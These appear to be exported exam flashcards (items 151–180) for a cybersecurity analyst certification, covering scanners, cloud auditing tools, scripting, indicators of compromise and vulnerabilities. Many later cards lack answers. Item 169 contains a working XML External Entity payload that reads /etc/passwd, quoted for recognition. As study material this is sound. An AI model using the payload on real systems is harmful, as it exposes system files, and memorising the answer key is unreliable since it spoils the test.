A security analyst has to perform a thorough security assessment of a client’s web infrastructure. The client has a large number of web servers, and the analyst needs to identify any vulnerabilities that may exist within them. To accomplish this task, the analyst needs a tool that can quickly scan multiple web servers and provide comprehensive information on any detected vulnerabilities. Given the following options, which tool best suits the security analyst’s needs in this scenario?

A.Nikto
B.Metasploit
C.Arachni
D.Burp Suite

A

A.- Nikto is a web server scanner that the security analyst can use to specifically identify vulnerabilities in web servers. It can quickly scan multiple web servers and provide comprehensive information on any detected vulnerabilities.

151
Q

A company’s security team needs to assess the security posture of its Amazon Web Services (AWS) environment, focusing on both the reconnaissance and exploitation phases of a penetration testing engagement. The team requires a tool that can automate various attack scenarios and validate the effectiveness of its cloud security controls. Which of the following tools is best suited for this task?

A.Pacu
B.Zed Attack Proxy (ZAP)
C.Tenable.io
D.Suricata

A

A.- Pacu is an open-source Amazon Web Services (AWS) exploitation framework for penetration testing engagements in AWS environments. It automates various attack scenarios and helps validate the effectiveness of cloud security controls.

152
Q

A company wants to evaluate the security posture of its Amazon Web Services (AWS) infrastructure to ensure it adheres to industry best practices and compliance standards. What tool can the company use to automate the auditing process and generate reports for their cloud environment?

A.Burp Suite
B.Nessus
C.Nmap
D.Prowler

A

D.-Prowler is an open-source security tool that helps organizations evaluate their Amazon Web Services (AWS) infrastructure and ensure it adheres to industry best practices and compliance standards.

153
Q

A cloud security team is looking for a multi-cloud security auditing tool that can assess the security posture of their Amazon Web Services (AWS), Azure, and Google Cloud Platform (GCP) environments. The cloud security team needs a tool that can provide a clear and concise view of potential security risks and misconfigurations. Which of the following tools is best suited for this task?

A.Wazuh
B.Aircrack-ng
C.ScoutSuite
D.Nikto

A

C.- ScoutSuite is an open-source multi-cloud security auditing tool that supports AWS, Azure, and GCP environments. It assesses the security posture of cloud environments and provides a concise view of potential security risks and misconfigurations.

154
Q

A software development company has launched a new e-commerce website for their client. The client has expressed concerns about the website’s security and has asked the development team to ensure that the website is secure from any potential threats. The development team has decided to conduct a web application security assessment to address these concerns. Which of the following tools best suits this task, considering its ability to identify security vulnerabilities, support automated testing, and extend functionality by installing add-ons?

A.Nikto
B.Maltego
C.Aircrack-ng
D.Zed Attack Proxy (ZAP)

A

D.- ZAP (Zed Attack Proxy) is a popular open-source web application testing tool. It has many features to support automated scanning, input manipulation, and API testing. Key features include an intercepting proxy for intercepting and modifying requests and responses between the browser and web application and an active scanner that can identify vulnerabilities such as SQL injection and cross-site scripting (XSS). Its plugin architecture can extend its capabilities, allowing users to create and share custom scripts and plugins.

155
Q

A software developer is working on a Linux-based application and encounters an unexpected issue in the code execution. The software developer needs a tool that can help them examine and debug the application, allowing them to inspect the runtime state and modify the program’s execution flow. Which of the following tools is best suited for this task?

A.Tcpdump
B.GNU Debugger
C.Wireshark
D.Cuckoo

A

B.- The GNU Debugger is a widely used debugging tool for Linux-based applications. It allows developers to examine and debug applications, inspect the runtime state, and modify the program’s execution flow.

156
Q

A security analyst at an organization receives an alert from their security information and event management (SIEM) system. Upon reviewing the log data, the analyst notices an increase in high-privilege actions within the network. What should the analyst prioritize when investigating this issue to identify the potential underlying cause?

A.Investigate unusual network traffic patterns
B.Analyze new user accounts
C.Review application logs for unexpected behavior
D.Examine recent file changes and modifications

A

B.- The analyst should prioritize analyzing newly created user accounts, as the increase in high-privilege actions may be related to the unauthorized introduction of new accounts with elevated permissions.

157
Q

A security analyst examines suspicious activity on a Linux-based server within the organization’s network. The analyst uncovers a file containing an obfuscated script that utilizes system-level commands. Which technique should the analyst use to efficiently investigate potential malicious activities related to this incident on the affected system?

A.Inspect the execution history of PowerShell scripts
B.Examine Python script execution history
C.Review JavaScript scripts output
D.Analyze shell script logs

A

D.- Analyzing shell script logs would be the most effective way to investigate potential malicious activities related to this incident on the affected Linux-based system. The obfuscated script seems to be utilizing system-level commands, which is typical for shell scripts.

158
Q

A cybersecurity analyst is investigating a security incident and suspects that an attacker is using a specific programming language to execute commands on the target system. The target system is running on a Windows environment. Which programming language is most commonly associated with scripting and automating tasks in this context?

A.Python
B.Bash
C.JavaScript
D.PowerShell

A

D.- PowerShell is a task-based command-line shell and scripting language designed specifically for Windows environments. It is used for scripting and automating tasks within Windows, making it the best choice for this scenario.

159
Q

A cybersecurity analyst is investigating a security incident and needs to search for specific patterns within large amounts of log data. Which programming tool or technique is most commonly used to identify patterns in text data and would be helpful for the analyst in this scenario?

A.Python
B.Regular expressions
C.Shell script
D.JavaScript

A

B.- Regular expressions are a powerful tool for defining and searching for specific patterns in text data, making them the most appropriate choice for this scenario.

160
Q

A software development company is building a custom application for a client that will collect and analyze moderate amounts of data to identify patterns and make predictions. The client has specified that the application must use a scripting language with many libraries and tools for machine learning. Which scripting language should the software developer use?

A.C++
B.Python
C.Java
D.JavaScript

A

B.- Python has a vast and well-established ecosystem for machine learning, with numerous libraries and tools available for tasks such as data analysis, visualization, and modeling.

161
Q

A security analyst discovers that a new scheduled task is executing an unknown script regularly. Upon further investigation, it shows that the script includes cmdlets that are specific to a certain scripting language. What is the most efficient way for the analyst to identify potentially malicious activity related to this incident on the affected system?

A.Review the output of JavaScript scripts
B.Examine Python script execution history
C.Analyze PowerShell logs
D.Investigate Ruby script dependencies

A

C.- Analyzing PowerShell logs would be the most effective way to identify potentially malicious activity since the discovered script includes cmdlets unique to a certain language, which the analyst can infer as PowerShell.

162
Q

A web developer at a startup company is building a new web application. The developer wants to ensure that the application is secure from various types of attacks. Which of the following frameworks would be the most appropriate for the web developer to use?

A.OWASP Web Security Testing Guide
B.International Organization for Standardization (ISO) 27001/27002
C.Open Source Security Testing Methodology Manual (OSSTMM)
D.Control Objectives for Information and related Technology (COBIT)

A

A.- OWASP Web Security Testing Guide is a comprehensive guide for web application security testing. It provides guidelines, best practices, and resources for web developers to ensure that their applications are secure from various types of attacks.

163
Q

DLP

A

In cybersecurity, Data Loss Prevention (DLP) refers to a set of strategies, technologies, and practices designed to ensure that sensitive or critical information does not get lost, leaked, or accessed by unauthorized individuals. DLP solutions aim to protect data from both accidental and intentional breaches.

164
Q

Ted, a file server administrator, has noticed that a large number of sensitive files have been transferred from a corporate workstation to an IP address outside of the local area network. Ted looks up the IP address and determines that it is located in a foreign country. Ted contacts his company’s security analyst, who verifies that the workstation’s anti-malware solution is up-to-date, and the network’s firewall is properly configured. What type of attack most likely occurred to allow the exfiltration of the files from the workstation?

MAC spoofing

Impersonation

Session hijacking

Zero-day

A

Zero-day

165
Q

You are conducting threat hunting for an online retailer. Upon analyzing their web server, you identified that a single HTML response returned as 45 MB in size, but an average response is normally only 275 KB. Which of the following categories of potential indicators of compromise would you classify this as?

Introduction of new accounts

Data exfiltration

Beaconing

Unauthorized privilege

A

Data exfiltration

166
Q

Judith is conducting a vulnerability scan of her data center. She notices that a management interface for a virtualization platform is exposed to her vulnerability scanner. Which of the following networks should the hypervisor’s management interface be exposed to ensure the best security of the virtualization platform?

Internal zone

External zone

DMZ

Management network

A
167
Q

Which law requires government agencies and other organizations that operate systems on behalf of government agencies to comply with security standards?

HIPAA

FISMA

SOX

COPPA

A
168
Q

You work for Dion Training as a physical security manager. You are concerned that the physical security at the entrance to the company is not sufficient. To increase your security, you are determined to prevent piggybacking. What technique should you implement first?

Install an RFID badge reader at the entrance

Install a mantrap at the entrance

Install CCTV to monitor the entrance

Require all employees to wear security badges when entering the building

A
169
Q

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xyz [
<!ELEMENT xyz ANY >
<!ENTITY abc SYSTEM "file:///etc/passwd" >]>

<xyz>&abc;</xyz>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on the output above, which of the following is true?

ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used

An XML External Entity (XXE) vulnerability has been exploited and it is possible that the file “/etc/passwd” has been downloaded.

The application is using parameterized queries to prevent XML injections

There is no concern since “/etc/passwd” does not contain any system passwords

A
170
Q

Which of the following type of solutions would you classify an FPGA as?

Trusted platform module

Anti-tamper

Hardware security module

Root of trust

A
171
Q

Dion Training allows its visiting business partners from CompTIA to use an available Ethernet port in their conference room to establish a VPN connection back to the CompTIA internal network. The CompTIA employees should obtain internet access from the Ethernet port in the conference room, but nowhere else in the building. Additionally, if a Dion Training employee uses the same Ethernet port in the conference room, they should access Dion Training’s secure internal network. Which of the following technologies would allow you to configure this port and support both requirements?

Implement NAC

Configure a SIEM

Create an ACL to allow access

MAC filtering

A
172
Q

Which type of system would classify traffic as malicious or benign based on explicitly defined examples of malicious and benign traffic?

Machine learning

Generative adversarial network

Deep learning

Artificial intelligence

A
173
Q

Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices?

MIB

SNMP

NetFlow

SMTP

A
174
Q

Which of the following commands would NOT provide domain name information and details about a host?

nslookup [ip address]

sc [ip address]

host [ip address]

dig -x [ip address]

A
175
Q

What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker?

Zone transfers

DNSSEC

CNAME

DNS registration

A
176
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URLs:
https://test.diontraining.com/profile.php?userid=1546
https://test.diontraining.com/profile.php?userid=5482
https://test.diontraining.com/profile.php?userid=3618
What type of vulnerability does this website have?

Improper error handling

Race condition

Weak or default configurations

Insecure direct object reference

A
177
Q

During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization’s AAA services manager?

SMS should be encrypted to be secure

SMS messages may be accessible to attackers via VoIP or other systems

SMS should be paired with a third factor

SMS is a costly method of providing a second factor of authentication

A
178
Q

Jeff has been contacted by an external security company and told that they had found a copy of his company’s proprietary source code on GitHub. Upon further investigation, Jeff has determined that his organization owns the repository where the source code is located. Which of the following mitigations should Jeff apply immediately?

Change the repository from public to private

Delete the repository

Investigate if the source code was downloaded

Reevaluate the organization’s information management policies

A
179
Q

$ cat dns.log | bro-cut query
gu2m9qhychvxrvh0eift.com
oxboxkgtyx9veimcuyri.com
4f3mvgt0ah6mz92frsmo.com
asvi6d6ogplqyfhrn0p7.com
5qlark642x5jbissjm86.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on this potential indicator of compromise (IoC), which of the following hypotheses should you make to begin threat hunting?

Fast flux DNS is being used for an attacker’s C2

The DNS server’s hard drive is being used as a staging location for a data exfiltration

The DNS server is running out of memory due to a memory resource exhaustion attack

Data exfiltration is being attempted by an APT

A
180
Q

Which of the following is NOT a means of improving data validation and trust?

Encrypting data in transit

Decrypting data at rest

Using MD5 checksums for files

Implementing Tripwire

A

Decrypting data at rest.